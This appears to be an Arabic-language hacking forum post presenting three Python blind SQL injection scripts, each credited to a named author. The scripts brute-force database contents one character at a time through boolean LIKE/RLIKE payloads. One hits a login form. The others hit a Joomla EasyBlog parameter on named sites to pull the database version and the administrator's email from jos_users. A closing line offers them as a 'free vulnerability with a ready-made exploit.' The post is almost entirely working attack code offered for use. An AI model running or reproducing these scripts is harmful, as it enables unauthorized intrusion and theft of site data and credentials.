كود PHP:
#!/usr/bin/python
from __future__ import print_function
import urllib2
import urllib
import binascii
import os
#os.system('cls')
print ("""
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] [+]
[+] Coded By Massacreur (Toxico-dz) [+]
[+] Email Webservers@hotmail.fr [+]
[+] [+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
""")
target="http://ox.com/login.php"
sql="version()"
bypass="userid=admin&password=a'"
end="%-- -"
marqueur='Transactions'
hex1 = ['1','2', '3', '4', '5', '6', '7']
hex2 = ['0', '1', '2', '3','4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
hexo = ""
m = 0
preget="%shex((%s)) like '" %(bypass,sql)
preget=preget
print ('[+] Loading ....')
def get_lien(target,hexo,hexnew):
global encode
post="%s%s%s%s" %(preget,hexo,hexnew,end)
params = {'searchinput':post,'searchsubmit':"zoeken"}
encode= urllib.urlencode(params)
req = urllib2.Request(target, encode)
reponse=urllib2.urlopen(req)
data=reponse.read()
return data
dz={}
while m==0:
for i in range(7):
m=1
data= get_lien(target,hexo,hex1[i])
dz[hex1[i]]=0
if marqueur in data:
dz[hex1[i]]=1
print (hex1[i], end ='')
hexo+='%s' %(hex1[i])
for h in range(16):
data2=get_lien(target,hexo,hex2[h])
if marqueur in data2:
print (hex2[h],end='')
hexo+=hex2[h]
if dz[hex1[i]]==1:
m=0
break
print (hexo)
print ('[+] HexToStr ....')
print (binascii.a2b_hex(hexo.strip()))
كود PHP:
#!/usr/bin/env python
from __future__ import print_function
import urllib2
import urllib
import binascii
import os
#os.system('cls')
print ("""
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] [+]
[+] Coded By Massacreur (Toxico-dz) [+]
[+] Email Webservers@hotmail.fr [+]
[+] [+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
""")
def get_lien(target,hexo,hexnew):
get="%s%s%s%s" %(preget,hexo,hexnew,end)
data = urllib.urlencode({'option' : 'com_easyblog',
'lang':"none",
'Itemid' : get})
req = urllib2.Request(url=target,data=data)
content = urllib2.urlopen(req).read()
return content
for z in range(1):
target="http://idia.org/index.php"
sql="SELECT email from jos_users where username='jadministrator' limit 0,1"
bypass="101' rlike if("
end="%',1,0x28)-- -"
marqueur='Recent blog posts'
hex1 = 'abcdefghijklmnopqrstuvwxyz0123456789_-@.ABCDEFGHIJKLMNOPQRSTUVWXYZ'
hex2 = 'abcdefghijklmnopqrstuvwxyz0123456789_-@.ABCDEFGHIJKLMNOPQRSTUVWXYZ'
hexo = ""
m = 0
preget="%s((%s)) like '" %(bypass,sql)
dz={}
print ('[+] Loading ....')
while m==0:
for i in range(len(hex1)):
m=1
data= get_lien(target,hexo,hex1[i])
dz[hex1[i]]=0
if marqueur in data:
dz[hex1[i]]=1
print (hex1[i], end ='')
hexo+='%s' %(hex1[i])
for h in range(len(hex2)):
data2=get_lien(target,hexo,hex2[h])
if marqueur in data2:
print (hex2[h],end='')
hexo+=hex2[h]
if dz[hex1[i]]==1:
m=0
break
print (hexo)
كود PHP:
#!/usr/bin/python
from __future__ import print_function
import urllib2
import binascii
import os
#os.system('cls')
print ("""
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] [+]
[+] Coded By Massacreur (Toxico-dz) [+]
[+] Email Webservers@hotmail.fr [+]
[+] [+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+]
""")
for z in range(1):
target="http://idia.org/index.php?option=com_easyblog&lang=none&Itemid=101"
sql="version()"
bypass="' rlike if("
end="%',1,0x28)-- -"
marqueur='Recent'
hex1 = ['1','2', '3', '4', '5', '6', '7']
hex2 = ['0', '1', '2', '3','4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
hexo = ""
m = 0
preget="%shex((%s)) like '" %(bypass,sql)
preget=preget.replace(' ','%20')
dz={}
print ('[+] Loading ....')
def get_lien(target,hexo,hexnew):
get="%s%s%s%s" %(preget,hexo,hexnew,end)
get=get.replace(' ','%20')
reponse=urllib2.urlopen('%s%s' %(target,get))
data=reponse.read()
return data
while m==0:
for i in range(7):
m=1
data= get_lien(target,hexo,hex1[i])
print (data)
dz[hex1[i]]=0
if marqueur in data:
dz[hex1[i]]=1
print (hex1[i], end ='')
hexo+='%s' %(hex1[i])
for h in range(16):
data2=get_lien(target,hexo,hex2[h])
if marqueur in data2:
print (hex2[h],end='')
hexo+=hex2[h]
if dz[hex1[i]]==1:
m=0
break
print (hexo)
print ('[+] HexToStr ....')
print (binascii.a2b_hex(hexo.strip()))
+
ثغرة مجانية مع استغلال جاهز
s;vfjhj prk